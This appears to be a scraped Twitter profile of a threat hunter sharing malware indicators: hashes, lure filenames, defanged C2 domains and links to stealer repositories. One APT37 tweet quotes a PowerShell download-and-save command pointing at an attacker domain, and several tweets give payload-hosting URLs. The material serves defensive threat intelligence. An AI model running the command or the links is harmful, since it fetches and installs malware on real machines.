Yogesh Londhe @suyog41 profile

Yogesh Londhe

@suyog41

Followers

2,457

Following

172

Media

659

Statuses

2,433

Threat hunting & detection writing

India

Joined August 2010

Don't wanna be here? Send us removal request.

Explore tweets Explore followers Explore following

Explore trending content on Musk Viewer

Hamas • 966026 Tweets

Milton • 706936 Tweets

Florida • 650177 Tweets

Chilpancingo • 228024 Tweets

Category 5 • 157776 Tweets

Cat 5 • 93540 Tweets

Atlantic • 64064 Tweets

Polymarket • 59766 Tweets

Floridians • 48527 Tweets

Doocy • 48162 Tweets

Doc Harris • 28944 Tweets

Carmen • 22016 Tweets

Cissy Houston • 21457 Tweets

ياسر • 19478 Tweets

Coachella • 17993 Tweets

Cleveland • 17080 Tweets

#فزعه_الشعب_السعودي • 15643 Tweets

Beatrice • 14709 Tweets

Vtubers • 13905 Tweets

Cat 6 • 12747 Tweets

Skubal • 12032 Tweets

#عبدالرحمن_المطيري • 10326 Tweets

Mansilla

Boyd

Florencio

イニエスタ

Richelle

佐久間くんピンク

企業献金・政活費

Manyoma

そばの日

キャセロール

物価目標

Copetti

Big Dave

Parker Meadows

Randazzo

Big Christmas

ENTA

Enzo Paolo

Ayhan Bora Kaplan

Emmanuel Clase

Cy Young

さっくんピンク

Kwan

DeSantis

#امير_مع_فايق

#RepDetroit

#ابوفهد_ينزل_اعفاء_Оち68ОО3135

Kerry Carpenter

Last Seen Profiles

@nonon12095

@Brandtopia_Ed

@allmakya

@PorterEastin

@ParaTwittt

@RichEisenShow

@StoweSport

@IndonesianIdol

@HE_Archaeology

@Vado087

@crackmecrazy18

@anchovy104

@Ember_Fund

@scotts_games

@RedSeaGlobal

@aktinuviel

@richard_ro5

@phoenixlamarrr

@becomingfemme

@woodlansports

Yogesh Londhe

@suyog41

5 months

Cash Ransomware 71f0e2645d9051c3a8f5cf2dbce9d074 #CashRansomware #Ransomware #IOC

70

10

131

Yogesh Londhe

@suyog41

2 years

Dynamic Stealer 85f398a03f3836374da7ed4a4cfe7d38 - Collect System info - Exfiltrate via telegram - download BlackNET Password Stealer dll from github ad42d271e4b7d5c14c179c6cbe559bef #DynamicStealer #BlackNETStealer #Stealer #IOC

1

16

42

Yogesh Londhe

@suyog41

1 year

NewsRat list_products.xlsm <uploaded from 🇻🇳> a2ccca25a57f7c333793be885fbaabd5 drops auno.exe [ https://nkstoreads\.com/auno.zip] 9B5A386B42ED4A71BBC7E5F02D8C839C nabi.dll 8218FB24A9F9FCA3E77A9AB23A21A17C C2 : 4.tcp.us-cal-1.ngrok\.io #NewsRat #RAT #IOC

1

9

39

Yogesh Londhe

@suyog41

1 year

CKS Stealer - Go Based Stealer - Digitally Signed (NUTRI GENETICA RESEARCH BRASIL LTDA) - collects browsers and credit card data and exfiltrate via Discord 007488d8ecfa0fdc12078e8f49922178 d463110965f4646c0684019aba95856a #CKSStealer #Stealer #IOC

Yogesh Londhe

@suyog41

1 year

Spark RAT signed with "NUTRI GENETICA RESEARCH BRASIL LTDA" 94acfa1e9b7d3fae4afbc550bce56853 7dff69f4a894a4b9729e1e71a344a084 - GO based RAT Sends stolen data to discord #SparkRAT #RAT #IOC

0

9

11

0

14

38

Yogesh Londhe

@suyog41

2 years

Bitter Elephant APT Termination for breaches of specified contractual obligations.chm [485b6e2bef303251789827d7829e3a3e] C2 : erswuniconsharing[.]com Schedule Task Name : PrintSpooler #Bitter #BitterElephant #BitterAPT #APT #IOC

3

16

38

Yogesh Londhe

@suyog41

7 months

China Navy First Training 2024(CN).docx c1ab783d60cf05636eb4f72d17c6cf1d looks targeted drops wword.exe df6b768247a9cdb5607819c79f02099d N/W http://syncscheduler[.]com/r3diRecT/redirector/proxy.php

5

9

38

Yogesh Londhe

@suyog41

1 year

Chinotto PowerShell Variant [APT37] Fukushima.rar a8c06b1f34c430358a2db30988066def 1.chm 9e6a2914a35256dd450db549fb975f45 C2 : navercorp[.]ru #Chinotto #APT37 #APT #IOC

MalwareHunterTeam

@malwrhunterteam

1 year

"Fukushima.rar": a4ac2b37cd35ad8b4f4cb737a7dbf5ae594fc2b62fea2efa192acac4d14fe254 "1.chm": b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a navercorp[.]ru @ShadowChasing1 @h2jazi

1

5

20

0

15

37

Yogesh Londhe

@suyog41

10 months

Scarlet Stealer 8db73fc61bf56eccd78600e53c27fe4c C2 for getting telegram config : telebyt[.]com Exfiltrate data via Telegram #ScarletStealer #Stealer #IOC

0

14

35

Yogesh Londhe

@suyog41

1 year

Millenuim RAT Advertised on GitHub https://github[.]com/Shinyenigma/Millenium-RAT https://github[.]com/Shinyenigma/Millenium-RAT-2 Telegram channel https://t[.]me/shinyenigma #Millenuim #RAT #Stealer #IOC

2

8

35

Yogesh Londhe

@suyog41

1 year

APT37 hanacard.rar fa31cd8d83328fce1f79b54490913d7f handcard.chm 2002dd3cf9e2ef96b74a99eee0dd5ec1 nobuay[.]ink powershell iwr -outf C:\Users\user\AppData\Local\Temp\alg.exe https://nobuay[.]ink/yzkah #APT37 #APT #IOC

0

10

35

Yogesh Londhe

@suyog41

5 years

#Atilla #Stealer Atilla Stealer.exe hxxps://atilla[.]vip/ @James_inthe_box

1

12

30

Yogesh Londhe

@suyog41

3 months

Kimsuky 4c12d617aa51bb0c0108242da6aa0071 attachment.docm (copy) 8783d7173dbdfd95f05501fa9a20e46f design.docm (copy) 46b1a7d4befaf02eda1938d50ea8c488 7ebfba0b98c135481c14db1c2f2da484 C2 koreaillmin[.]mypressonline[.]com #Kimsuky #APT #IOC

2

13

34

Yogesh Londhe

@suyog41

2 months

SideWinder Indian Cyber Activity.docx 3d9961991e7ae6ad2bae09c475a1bce8 C2 https://moittadvisory[.]pmd-offc[.]info #SideWinder #APT #IOC

0

18

34

Yogesh Londhe

@suyog41

1 year

Uploaded from 🇹🇯 87da908f8b2556f312f97091be97743a 464.rar-> Red_Book_2024_PM_NV_Russian.pdf.lnk -> sys.hta -> file.js - show decoy pdf ->rat.js - execute payload -> startpng.js - show decoy pdf -> decode&execute powershell backdoor C2 : tpp[.]tj #IOC

3

9

32

Yogesh Londhe

@suyog41

6 months

#ROKRAT #APT37 #APT #IOC ROKRAT 설비목록.lnk Equipment list.lnk 82f881a33eafee75fb1344432f76faf6 580601bc3f7016b59f8919fa7433639b [zip]

1

10

31

Yogesh Londhe

@suyog41

1 year

Bitter Elephant APT Invitation To Attend Cryptocurrency Awareness Seminar.chm 0b4aab3d1e2946b15b70a63187c1f927 C2 : dashonlineclub[.]com Schedule Task Name : GoogleService #Bitter #BitterElephant #BitterAPT #APT #IOC

1

13

30

Yogesh Londhe

@suyog41

2 years

SideCopy/InSideCopy APT targeting DRDO India PreBot DRDO-K4-Missile-Clean-room[.]zip 0725318b4f5c312eeaf5ec9795a7e919 itw : https://www.cornerstonebeverly[.]org/js/files/DRDO-K4-Missile-Clean-room #SideCopy #TransparentTribe #PreBot #apt

5

13

28

Yogesh Londhe

@suyog41

2 years

ToxicEye RAT 25744844f569ba89f39995efdf9b830f downloads rat.exe 5b45640a3bd4fdc32df75aa462f5a167 #ToxicEyeRAT #RAT #IOC

0

12

29

Yogesh Londhe

@suyog41

4 months

XenoRAT Transaccion_Recibos.xls 68c5023be707d4ecc6d963e273feb3ff cftjfc.exe 6621fcab4de5fab7eac4d8d03c87f233 C2 91.92.248.167 busyestinglsv[.]site #XenoRAT #RAT #IOC

0

7

29

Yogesh Londhe

@suyog41

1 year

ROKRAT Korea National Intelligence Society 2023 Summer Academic Conference and 5th~.zip 2cafced7bd983a213938f906b185ffff #ROKRAT #APT37 #APT #IOC

1

9

29

Yogesh Londhe

@suyog41

2 months

Spyware.vbs 🇻🇳 941278a66ef392f4408e250237a1809b Spy[.]py a36b060b04cea287690edaf335e4cb4f GitLab https://gitlab[.]com/ranlab1st/Spyware #Stealer #IOC

2

11

28

Yogesh Londhe

@suyog41

1 year

Muggle Stealer 309aef472f49e47a5908ca062df7fe9b - Go based Stealer - Collects WIFI & browser password, Screenshot, Disk Info - Exfiltrate data to 49.232.241[.]188 [Chinese IP 🇨🇳] #MuggleStealer #Stealer #IOC

Yogesh Londhe

@suyog41

2 years

Muggle Stealer c8ed60d1f24a7119612cd5bde0ddc1e1 - Go based Stealer - Collects WIFI & browser password, Screenshot, Disk Info - Exfiltrate data to 101.43.32[.]249 [Chinese IP 🇨🇳] #MuggleStealer #Stealer #IOC

1

11

18

0

8

27

Yogesh Londhe

@suyog41

6 months

Braodo Stealer a2fddc95bca0607f6819d843d07c7ad2 uploaded from 🇻🇳 download payload & python library from GitHub https://github[.]com/sdvsdv23rbfdb3/kjkj sim[.]py #Braodo 58cd5f65c84520b83a336bbedc6b0ae8 #Stealer #IOC

Yogesh Londhe

@suyog41

6 months

Braodo Stealer Company menu for upcoming event. to accountant Maureliaazzahra[.]zip f8a43592f46538e2ce7d74f14114370e uploaded from 🇹🇭 download payload & python library from GitHub https://github[.]com/buvoi/ sim[.]py #Braodo 62c3be267f45f464048cf8375301a255 #Stealer #IOC

1

16

20

1

10

26

Yogesh Londhe

@suyog41

1 year

Unknow Stealer 8d47fe694299a753276a3265f597bab1 463b2127567018f38c0d583cf1c6d9ee 73e5d8ba5d99ef5e0792c3ab1cecf626 2e1a37306e39264e6be7b2fb3b6d513a C2 : 45.15.156.168 #stealer #IOC

5

8

27

Yogesh Londhe

@suyog41

10 months

Bitter Elephant APT Circular .chm 8a89ef6e49a6c6cfcc51ce48c202c922 C2 : paulalesiastyles[.]com Schedule Task Name : IntelHDGraphicsDriverUpdates #Bitter #BitterElephant #BitterAPT #APT #IOC

0

9

27

Yogesh Londhe

@suyog41

2 years

XWorm V3.1 -> doc.exe [ef549ca97123941f2f3cebc6618f4c22] (loader) loads dll from -> http://babfahim[.]co[.]ke/panel/uploads/Bmihtpx.dll exflitrate data via telegram #XWorm #rat #ioc

0

7

26

Yogesh Londhe

@suyog41

2 months

KnowBe4 phishing doc crowdstrike-hotfix.xlsx d09c3acea494b0c0cbba0ee0b8165814 #KnowBe4 #IOC

0

11

27

Yogesh Londhe

@suyog41

3 months

#Apollo #Patchwork #APT #IOC Apollo Large_Innovation_Project_for_Bhutan.pdf.lnk 53d750517e15189c6901c4bd567237b1 payload from beijingtv[.]org drops Winver.exe (signed) GO based backdoor 13dcd6f1fd44f7f15651153167b646cc Signer Blackbox Hosting Limited C2 cartmizer[.]info

Yogesh Londhe

@suyog41

7 months

Apollo uploaded from 🇵🇰 Password to open pdfs.txt.lnk dfb97438f0ec94e78a2a1e3d32bc11d5 n/w https://ruz98[.]b-cdn[.]net/22 drops Winver.exe (signed) GO based backdoor 13dcd6f1fd44f7f15651153167b646cc Signer COMPUTING AND CODING LIMITED C2 espncrics[.]info #Apollo #IOC

2

4

13

1

16

25

Yogesh Londhe

@suyog41

6 months

Python Stealer uploaded from 🇻🇳 Meta Business Suite[.]zip b8a9cc16743d84f86bf55573e5e7c8b5 Meta Business Suite.exe 78beb15a7ae0e38785a20c7a0cdcf1d9 #pythonStealer #Stealer #IOC

1

8

26

Yogesh Londhe

@suyog41

3 months

Bitter Elephant APT CASICloud Proposal.chm 18f47ae310581aaf1282d27f7b5acf9e C2 shioyuilubiz[.]com Schedule Task Name EdgeUpdaterUI #Bitter #BitterElephant #BitterAPT #APT #IOC

0

8

26

Yogesh Londhe

@suyog41

2 years

Sometime User-Agent also gives hint of malware family. Lilith Stealer => User-Agent: Lilith-Bot/3.0 SVC Loader => User-Agent: svc/1.0 Record stealer/Raccoon Stealer 2.0 => User-Agent: record

1

7

26

Yogesh Londhe

@suyog41

1 year

RATRUN Stealer photo_2023-05-03_09-53-43.jpg.exe c0bed62ad77fb0786f2bb6d5929266c8 - Uploaded from 🇻🇳 - Python based Stealer #RATRUN #RATRUNStealer #Stealer #IOC

0

7

25

Yogesh Londhe

@suyog41

10 months

Chinotto PowerShell Variant [APT37] NService_youngji057.chm New updated command 717d7c2ee8e97b512cbcecde3aa300c3 C2 : goodmarket[.]or[.]kr #Chinotto #APT37 #APT #IOC

Neo_C

@lightC07379408

10 months

#APT #APT37 MD5:717d7c2ee8e97b512cbcecde3aa300c3 Filename:NService_youngji057.chm remote-html:hxxp://goodmarket.or.kr/admin/sms/3.html

0

4

19

0

11

25

Yogesh Londhe

@suyog41

1 year

Bitter Elephant Upgradation of Systems Document.rar 88a7f9b4d302c3981f8e143fdf053989 Upgradation of Systems Document.chm 410ef267cd56b74c6a7578947efb3b66 C2 :wbfashionshow[.com Schedule Task Name : MicrosoftEdgeUpdateTaskMachineDwell #Bitter #BitterElephant #BitterAPT #APT #IOC

0

11

25

Yogesh Londhe

@suyog41

7 months

Planet Stealer f72f063babd357ccdc6c346191a305b9 #PlanetStealer #Stealer #IOC

0

9

25

Yogesh Londhe

@suyog41

1 year

RDP Stealer 494f8c677b0fb4d25877f4ac50998e35 associated telegram channel https://t[.]me/s/rdpstealer https://t[.]me/s/F_Society_XD https://t[.]me/Fake_Sec #RDPStealer #Stealer #IOC

Yogesh Londhe

@suyog41

1 year

Python Stealer 88f4f9a1a21088d5446e1d595d970a42 #PythonStealer #Stealer #IOC

0

2

0

6

24

Yogesh Londhe

@suyog41

4 months

Kematian Stealer 02f3b7596cff59b0a04fd2b0676bc395 [Downloader] n/w https://github[.]com/ChildrenOfYahweh/Kematian-Stealer/releases/download/Fixed_version/main.exe [removed] GitHub Code https://github[.]com/Somali-Devs/Kematian-Stealer #KematianStealer #Stealer #IOC

1

11

23

Yogesh Londhe

@suyog41

1 year

Sidewinder Update for DG Lecture _ as of 3-9-23 Pol 1.doc 28542194a6ea186be3a20ca2cdd12555 drops sxshared.dll ce722d70391c98871ae784f08d27dae3 C2: mailmofa[.]mofa-gov[.]org #Sidewinder #APT #IOC

2

7

24

Yogesh Londhe

@suyog41

1 year

Solan Stealer - Python Stealer 15_Project_Digital__Marketing_Plan_Facebook_Advertising_Maketing.exe c88e21aaa537b76d3e5199c4634c8986 Google Bard AI.exe 7aaa2270c6044527c0e373648ca6d350 Seems 🇻🇳 Threat actor targeting FB ad. account TTP looks like #DUCKTAIL #SolanStealer #IOC

1

14

24

Yogesh Londhe

@suyog41

3 months

Another campaign with CrowdStrike decoy New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm dd2100dfa067caae416b885637adc4ef Download & decrypt mscorsvc.dll eb29329de4937b34f218665da57bcef4 #stealer uploads stolen data to 172[.]104[.]160[.]126 #IOC

1

12

24

Yogesh Londhe

@suyog41

1 year

Bitter Elephant APT TTP change : lnk instead of chm file Invitation_letter 20230927.docx .lnk e447c236cd4def13d16710650b50ebec C2 : webandersondesign[.]com Task Name : EdgeUpdateUE #Bitter #BitterElephant #BitterAPT #APT #IOC

2

12

24

Yogesh Londhe

@suyog41

2 years

Vector Stealer 7a29029e73156fa977badcb2dfab153d Exfiltrate data via telegram #VectorStealer #Stealer

2

8

23

Yogesh Londhe

@suyog41

1 year

samsungfire.chm 8f1559c69801205659e3f9760300ee4e C2: attiferstudio[.]com #APT37 #APT #ioc

4

10

23

Yogesh Londhe

@suyog41

2 years

RootFinder Stealer 1.0.0 373bb4e17fbf239f2d02ea3fb3dfa352 #RootFinderStealer #Stealer #IOC

4

5

22

Yogesh Londhe

@suyog41

4 months

#ROKRAT #APT37 #APT #IOC ROKRAT ebb764dc8aa586deaaae8aa56b82bb15 cfffb45df8f05d1cb5d9d95fd5a83e9e

2

15

23

Yogesh Londhe

@suyog41

2 months

Braodo Stealer Lot of TTP change, added more functionality doneTN-obf0818TN.bat b549acd8095be9f16ac2586bb28d91ac download payload & python library from GitLab gitlab[.]com/lab41170133/lab4a #Braodo #Stealer #IOC

0

13

23

Yogesh Londhe

@suyog41

1 year

Ducktail lnk sample c655b7a30f35fb9fe50a7269260d8986 0366e8df2869398541307e42f4547f1f a0d2be72860652716863d51a9811c502 b0c6f0e3338ac66be1ac2505856e2b04 drops svczHost.exe D3E815A620DBC31AEBB4BA85A2DD6E80 C2 : ductai[.]xyz vulinh[.]online #Ducktail #APT #IOC

1

4

23

Yogesh Londhe

@suyog41

11 months

VARE Stealer f9d8a6de70b181ef5833f2256534d111 git https://github[.]com/saintdaddy/Vare-Stealer tg https://t[.]me/varestealer #VAREStealer #Stealer #IOC

0

9

22

Yogesh Londhe

@suyog41

1 year

Ducktail Now using lnk DISRUPTIVE_AGENCY_FACEBOOK_ADS_JOB_INVITATION_AUGUST_2023 0.pdf.lnk dd80276c5b9b464a11a82a144f22ac9e bundlen2a1_every_new.bat 64080205ca8ce9d196547f9a51e0da9a Signed by : "Nguyen Dinh Ngoc" same signer : 08689e181881689ed53dfef9a6da8cda #Ducktail #APT #IOC

1

6

22

Yogesh Londhe

@suyog41

11 months

ROKRAT 19632144585e7d9ed6ccdad9c061f56b [zip] 2023년 10월4주차 주간 국제안보군사정세(통권 제273호).lnk Weekly international security and military situation for the 4th week of October 2023 (Vol. 273) 337bbc45280073edd0ec63a9cffeacbc #ROKRAT #APT37 #APT #IOC

1

5

23

Yogesh Londhe

@suyog41

1 year

RokRAT 11036182018[.]zip c92c47732d991bcf4e02ba0910931f7f lnk 71dbebb8a31ea3de0115851bb15fd2bc #RokRAT #APT37 #IOC

0

7

23

Yogesh Londhe

@suyog41

1 year

DonotGroup APT Chinese Delegation.doc 666562e03e2c7defe9eb5fec6862e813 drops dll dnb118point.dll 9DF3026D47F07F3012528522AE9D6154 C2: leasly[.]buzz mutex: firefreemut #Donot #DonotGroup #APT #IOC

1

9

21

Yogesh Londhe

@suyog41

4 months

Braodo Stealer List of desktop computers + video cards and accessories.bat 60ac9dc729f2369b737c3e928d73687d uploaded from 🇰🇭 download payload & python library from GitHub https://github[.]com/dsjhgd/555 sim[.]py #Braodo d9cf5ee79993a6375a5b63b17f229781 #Stealer #IOC

0

10

22

Yogesh Londhe

@suyog41

11 months

ROKRAT 2023년 11월 청구내역.zip Claim details as of November 2023[.]zip b58e06fc0ef74abfd5ede1e44aa8de4c 2000215005_20231107_20231127_rvim.html.lnk 015ba89bce15c66baebc5fd94d03d19e #ROKRAT #APT37 #APT #IOC

1

7

21

Yogesh Londhe

@suyog41

1 year

NewsRat aziru_temp.zip c637316f49ea797bdf31f0445a370a7e ⬇️ vn.cmd 5cf38b6d8b3681e7229937b0d419fb6a ⬇️ python39[.]zip 5dd58e82491209830ceac29287047412 ⬇️ aziru.exe c88cc620822429acd79ba0af5cef9621 opman.dll 752c769de5348459027b0309e6d3ff99 C2 : nkstoreads[.]com #NewsRat #RAT #IOC

Yogesh Londhe

@suyog41

1 year

NewsRat list_products.xlsm <uploaded from 🇻🇳> a2ccca25a57f7c333793be885fbaabd5 drops auno.exe [ https://nkstoreads\.com/auno.zip] 9B5A386B42ED4A71BBC7E5F02D8C839C nabi.dll 8218FB24A9F9FCA3E77A9AB23A21A17C C2 : 4.tcp.us-cal-1.ngrok\.io #NewsRat #RAT #IOC

1

9

39

0

6

22

Yogesh Londhe

@suyog41

10 months

Bitter Elephant APT MoHA Border and Immigration Section Order.chm 9711ffe3cace7b8f367e68c2a42e59fb C2 : newlbfashions[.]com Schedule Task Name : MicrosoftServicesAutoUpdate #Bitter #BitterElephant #BitterAPT #APT #IOC

0

6

22

Yogesh Londhe

@suyog41

11 months

Practis Stealer 4fe5e2d12a92cc8f6473e4070105866d - Rust Stealer - Steal Chrome & Firefox Cookies, History - Take Screenshot - Exfiltrate stolen data via Telegram #PractisStealer #RustStealer #Stealer #IOC

0

7

22

Yogesh Londhe

@suyog41

4 months

#Ducktail #APT #IOC C2 patumdesign2[.]online MeetingForm_PartumDesignStudio.lnk d8bc5aa4cd8c85c62f96e0601ac043f1ed1bbe543ff1c4b27c5ba64f864dc117 Jobdescription_DigitalMarketingExecutive.lnk de353a6b4dae309666303bda267223f51985e5cca270a8524c3855d446e1fede

3

7

22

Yogesh Londhe

@suyog41

1 year

Rage Stealer / Priv8 Stealer b45536ef0352510ac94feaa766befa8f #RageStealer #Priv8Stealer #Stealer #IOC

2

5

21

Yogesh Londhe

@suyog41

8 months

Elusive Stealer 0f00b9d4f63ec99dc4bb6dd729811e9a Telegram Channel - t[.]me/ElusiveStealer - t[.]me/ElusiveSupport #ElusiveStealer #Stealer #IOC

0

6

22

Yogesh Londhe

@suyog41

5 months

Braodo Stealer Health Index-Thunburi Bamrungmuang Bangkok.bat 0d7cefd03249329ae3f9fa34ffdd4945 uploaded from 🇹🇭 download payload & python library from GitLab https://gitlab[.]com/1239305819/aaa project[.]py #Braodo [name change] 36f2dda223ef067520602ce62f83a96b #Stealer #IOC

Yogesh Londhe

@suyog41

5 months

Braodo Stealer Tool-Scan-Proxy.doc c7372d16dc2ed8b7a0ffa8d9f2b6b0f2 uploaded from 🇻🇳 download payload & python library from GitHub https://github[.]com/bao3125 sim[.]py #Braodo f21cfe732873f90927d69552c3fa1ada #Stealer #IOC

1

9

17

2

15

22

Yogesh Londhe

@suyog41

2 months

Braodo Stealer VIP guest list + organization plan + menu list.vbs a3ebbec32f8bab220f67db9d47b2172a download payload & python library from GitHub https://github[.]com/teetbothaf/luckydaytuananh/ sim[.]py #Braodo 6ba78f53c95c305c4508d18d7e0795af #Stealer #IOC

0

6

22

Yogesh Londhe

@suyog41

1 year

Bandit Stealer BTCFlasher.exe 17c697da407acacadcaa8fb5c4885179 - Go Based Stealer - Get Sysinfo, browser, credit card info - Exfiltrate data via Telegram Low VT sore 3/ 70 #BanditStealer #Stealer #IOC

1

8

20

Yogesh Londhe

@suyog41

2 years

Kaiji downloader 9aea4d265abb17850434fa7021c2c5e5 #Kaiji #botnet #IOC

0

6

22

Yogesh Londhe

@suyog41

14 days

Korplug / PlugX Meeting Invitation.msc 026a6ed068b12ea1447ca20d4f82452f drops 6aa266.msi 7c23b3eb95d4f5be3dae181c2c473573 hid.dll 1fdae36641f385b30541331611105598 C2 : loginge[.]com #Korplug #PlugX #GrimResource #IOC

2

5

21

Yogesh Londhe

@suyog41

2 months

Bitter Elephant APT Policy Updates -2024.chm 45b3b5f1fc781292578ee4f52f813b2f C2 : pdcunaco[.]com Schedule Task Name : AdobeAcrobatServicesUA #Bitter #BitterElephant #BitterAPT #APT #IOC

1

10

21

Yogesh Londhe

@suyog41

10 months

APT37 미신고 자금출처 소명자료 제출 요청안내.zip af59a2864bf30af494122ab5b69ad8e2 미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk ceb4847592b0b9ddc2b9c239fa48c471 #APT37 #APT #IOC

1

6

21

Yogesh Londhe

@suyog41

1 year

f3aed849bd5d-focus-human-rights-concerns-bind-us-s-korea-with-japan-over-abductions.zip d75aa4bbdddedf2c2e698c6f2f6a0ede f3aed849bd5d-focus-human-rights-concerns-bind-us-s-korea-with-japan-over-abductions.lnk e6f485b34e7db6f6f1b3fc05f9bff3d5 anyone got payload? #IOC

1

6

21

Yogesh Londhe

@suyog41

1 month

Amnesia Stealer 7ea99740a913fd01ab5b6d630a65f501 Telegram https://t[.]me/amnesia49406 GitHub https://github[.]com/amnesia333/Amnesia #AmnesiaStealer #Stealer #IOC

FalconFeeds.io

@FalconFeedsio

2 months

🚨 Amnesia Malware 🚨 We have discovered a new malware named 'Amnesia', which comes in two tiers: Free and VIP. The Free version includes an extensive array of malicious capabilities such as a GUI Builder, startup persistence, fake Error, exe binder and various data theft

0

6

12

1

5

21

Yogesh Londhe

@suyog41

1 year

Anthrax Stealer 46a42c6ce70572f1ef63cee73844f43e - Steal Browsers cookies, Cryptocurrency, FTP Credential - Take Screenshot - Exfiltrate via Discord #AnthraxStealer #Stealer #IOC

2

9

21

Yogesh Londhe

@suyog41

5 months

#MWPAK / #SynsScheduler #SideWinder #APT #IOC uploaded from 🇨🇳 f7dda6bfa9bdb2018b4a1056c45bc639 工作计划修订.xls Work plan revision.xls 6723be4fc978133699d55e65945b85ab drops console.exe 88f120d331ec46c2908486a72d6665a1 ref

Yogesh Londhe

@suyog41

7 months

China Navy First Training 2024(CN).docx c1ab783d60cf05636eb4f72d17c6cf1d looks targeted drops wword.exe df6b768247a9cdb5607819c79f02099d N/W http://syncscheduler[.]com/r3diRecT/redirector/proxy.php

5

9

38

0

11

21

Yogesh Londhe

@suyog41

1 year

How helpful will the Washington Declaration be in responding to the North Korean nuclear threat?.lnk 445e7fd6bb684420d6b8523fe0c55228 #ROKRAT #APT37 #APT #IOC

2

9

21

Yogesh Londhe

@suyog41

9 months

Solan Stealer 47c77b3a1f93756b54cc729f0c83a78415ca962bcce7707b32f063ba6dd9bbd6 C2 seven-bot[.]ddns[.]net Ref #SolanStealer #Ducktail #Stealer #IOC

MalwareHunterTeam

@malwrhunterteam

9 months

"JD Document detailing Digital Marketing recruitment\.zip": 1ecb13a89214394fc0889aaaadd4556b2c10920c0a3c401c28cd3dac2ac1edce "Digital marketing recruitment materials 01-16\.zip": f27ded94455ead989c947877c7d00002e834b6cbaa6914616f1487912a6ff27f (1/2)

1

2

3

0

11

19

Yogesh Londhe

@suyog41

2 months

SideWinder Indian Cyber Activity.docx cd7c51061ec258b605cf2924d72e90a6 C2 https://cyber[.]pmd-offc[.]info/791918/pn/ #SideWinder #APT #IOC

Yogesh Londhe

@suyog41

2 months

SideWinder Indian Cyber Activity.docx 3d9961991e7ae6ad2bae09c475a1bce8 C2 https://moittadvisory[.]pmd-offc[.]info #SideWinder #APT #IOC

0

18

34

0

7

20

Yogesh Londhe

@suyog41

4 months

Mint Stealer e6e620e5cac01f73d0243dc9cf684193 Telegram https://t[.]me/mintOnTop #MintStealer #Stealer

2

10

20

Yogesh Londhe

@suyog41

2 months

Bitter Elephant APT DG_NSI_mail_issue.pdf.chm 9210d4e6979695929a37e4bc3fff3a8f C2 : adamsresearchshare[.]com Schedule Task Name : IntellGraphicsUpdateTask #Bitter #BitterElephant #BitterAPT #APT #IOC

2

9

20

Yogesh Londhe

@suyog41

1 year

kimsuky Message.chm 5f88da72abdbd23da4df12385f26eb99 C2 : ibsq[.]co[.]kr #kimsuky #chm #IOC

0

7

19

Yogesh Londhe

@suyog41

1 year

Ducktail a90e480c4bec77c40309cf1ea2545eb9 Signers:CONG TY TRACH NHIEM HUU HAN THIET BI NOI THAT TAKASY Project_Details_And_Salary_Bonus.exe 606e9a3611d5f0148507100663dc0f2a Company_details_KPI_salary-2023.exe dbac450335b90ef1f0a90e103725aa0a #Ducktail #APT #IOC

2

7

20

Yogesh Londhe

@suyog41

1 year

Kimsuky 99a46171dfd6db1b74ffab07cb122996 e9e52b3f48f0baaa3007db3179ee031d 956b66570ee20d21aa2bb54e7763163e 9ddd0523620f569f076506ebb75c4c30 bce2279bedd3c707b0e3e58a324ecd2e 4b4fae69389910a301489aaadb0e11df d64d9d86a05a0931596b0e6b47a39e0e #Kimsuky #APT #IOC

1

5

20

Yogesh Londhe

@suyog41

6 months

Braodo Stealer Company menu for upcoming event. to accountant Maureliaazzahra[.]zip f8a43592f46538e2ce7d74f14114370e uploaded from 🇹🇭 download payload & python library from GitHub https://github[.]com/buvoi/ sim[.]py #Braodo 62c3be267f45f464048cf8375301a255 #Stealer #IOC

1

16

20

Yogesh Londhe

@suyog41

22 days

CertInstall.msc 14d4bc28f58affbb03b0afd2d756c716 downloads speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/eHEzMnhmZDg2.zip eHEzMnhmZDg2[.]zip eca983a639c1eee4e4462962e7896605 Motnug[Winnti] ? #IOC

2

9

20

Yogesh Londhe

@suyog41

1 month

CobaltStrike 1c5fdc9e8c7106b88ce0aeda1dca55bb [MSC file] drops decoy 美国战略收缩对中东地缘政治的影响（稿件）.docx The Impact of US Strategic Retrenchment on Middle East Geopolitics (Manuscript).docx 7a79ab30b38601d2797a04be6194fdc4 #CobaltStrike #IOC

1

7

20

Yogesh Londhe

@suyog41

1 year

Tigon Stealer Video_Making_Tools_Pro.rar 1062cc8ce06060b5f50d62f77511b8e7 Video_Making_Tools_Pro.exe 2ca6b0f71696a7c7d7bf1a3d8be01215 - Uploaded from 🇻🇳 - python stealer - exfiltrate via telegram - Telegram channel : t[.]me/changnang #TigonStealer #pythonstealer #stealer #IOC

0

5

18

Yogesh Londhe

@suyog41

2 years

Zaraza Stealer 41d5fda21cf991734793df190ff078ba #ZarazaStealer #Stealer #IOC

2

5

18

Yogesh Londhe

@suyog41

1 year

Phemedrone Stealer 55d373ab2c26997248b0273da2a48232 #Phemedrone #Stealer #PhemedroneStealer #IOC

Yogesh Londhe

@suyog41

1 year

Phemedrone Stealer 93483fc26f5c3772a347ac8f9d4d6c6f #PhemedroneStealer #Stealer #IOC

0

3

0

4

19

Yogesh Londhe

@suyog41

10 months

Stink Stealer - Python Stealer 1ce5f9901fdf886e3d2a736e46ff0bed #StinkStealer #Stealer #IOC

1

4

19

Yogesh Londhe

@suyog41

9 months

Document detailing Digital Marketing recruitment[.]zip 3fc74abf5a0c88ccfcddcd2f995a294b35275174299bc36069f1925cf2cb7c7b Python Stealer 05386f3b8d8c87bf3609a65d5306483f65529ed355aedc2c62d52847dd12ec6e seems from solan stealer [ #Ducktail ] actor ref

MalwareHunterTeam

@malwrhunterteam

9 months

@1ZRR4H @AzakaSekai_ Related "Document detailing Digital Marketing recruitment\.zip": 07141b4fc9e5b63ae4fa6ff83dde9a0a864ec81ac932e751990cad751bef6c80

1

3

1

7

19

Yogesh Londhe

@suyog41

10 months

Bitter Elephant APT Letter - Mr Suriyapong KUMSOPAR (FS-THA5057-2200482 CPR).chm 0d8e8e4dbcd6ae44b8bff551c97d81c4 C2 : mikeyourevents[.]com Schedule Task Name : Edgeupdates #Bitter #BitterElephant #BitterAPT #APT #IOC

0

11

18

Yogesh Londhe

@suyog41

2 years

